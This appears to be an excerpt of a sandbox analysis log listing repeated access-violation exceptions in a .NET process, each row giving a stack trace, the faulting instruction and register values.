__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd954f 0x7fd8d21 0x7fd0b03 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33484448 registers.edi: 33484728 registers.eax: 0 registers.ebp: 33484456 registers.edx: 0 registers.ebx: 33486212 registers.esi: 43634760 registers.ecx: 43641844	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x2207e20 0x2207d55 0x220347b 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x2207eb9 registers.esp: 34403308 registers.edi: 38320100 registers.eax: 0 registers.ebp: 34403332 registers.edx: 6244880 registers.ebx: 38320120 registers.esi: 38320920 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x2209d99 0x2209d13 0x2208eb5 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 1e exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220a014 registers.esp: 34402684 registers.edi: 38601440 registers.eax: 40507392 registers.ebp: 34402744 registers.edx: 0 registers.ebx: 38605712 registers.esi: 40507392 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x2209d99 0x2209d30 0x2208eb5 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 1e exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220a014 registers.esp: 34402684 registers.edi: 38601440 registers.eax: 38245292 registers.ebp: 34402744 registers.edx: 0 registers.ebx: 40717368 registers.esi: 38245292 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x2209d99 0x2209d30 0x2208eb5 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 1e exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220a014 registers.esp: 34402684 registers.edi: 37974060 registers.eax: 39593676 registers.ebp: 34402744 registers.edx: 0 registers.ebx: 38373636 registers.esi: 39593676 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 e8 b5 90 89 6e 89 85 44 fe ff ff 8b d0 8d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x22090a4 registers.esp: 34402792 registers.edi: 34402992 registers.eax: 0 registers.ebp: 34403320 registers.edx: 6244880 registers.ebx: 39805904 registers.esi: 0 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220ccd9 0x2209392 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220cf23 registers.esp: 34402700 registers.edi: 37974060 registers.eax: 41029892 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 39809836 registers.esi: 41029892 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220ccd9 0x2209392 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220cf23 registers.esp: 34402700 registers.edi: 37974060 registers.eax: 42379592 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 41159536 registers.esi: 42379592 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220ccd9 0x2209392 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220cf23 registers.esp: 34402700 registers.edi: 37974060 registers.eax: 43729292 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 42509236 registers.esi: 43729292 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220cfa9 0x2209432 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220d181 registers.esp: 34402700 registers.edi: 37974060 registers.eax: 0 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 38245856 registers.esi: 38845676 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220cfa9 0x2209432 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220d181 registers.esp: 34402700 registers.edi: 37974060 registers.eax: 0 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 39114564 registers.esi: 40334612 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220cfa9 0x2209432 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220d181 registers.esp: 34402700 registers.edi: 37974060 registers.eax: 0 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 40603500 registers.esi: 41823548 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220d2d9 0x22094be 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220d4aa registers.esp: 34402700 registers.edi: 39524244 registers.eax: 0 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 38659156 registers.esi: 39258976 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220d2d9 0x22094be 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220d4aa registers.esp: 34402700 registers.edi: 39524244 registers.eax: 0 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 39530196 registers.esi: 40750244 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220d2d9 0x22094be 0x22087cc 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220d4aa registers.esp: 34402700 registers.edi: 39524244 registers.eax: 0 registers.ebp: 34402752 registers.edx: 0 registers.ebx: 41021464 registers.esi: 42241512 registers.ecx: 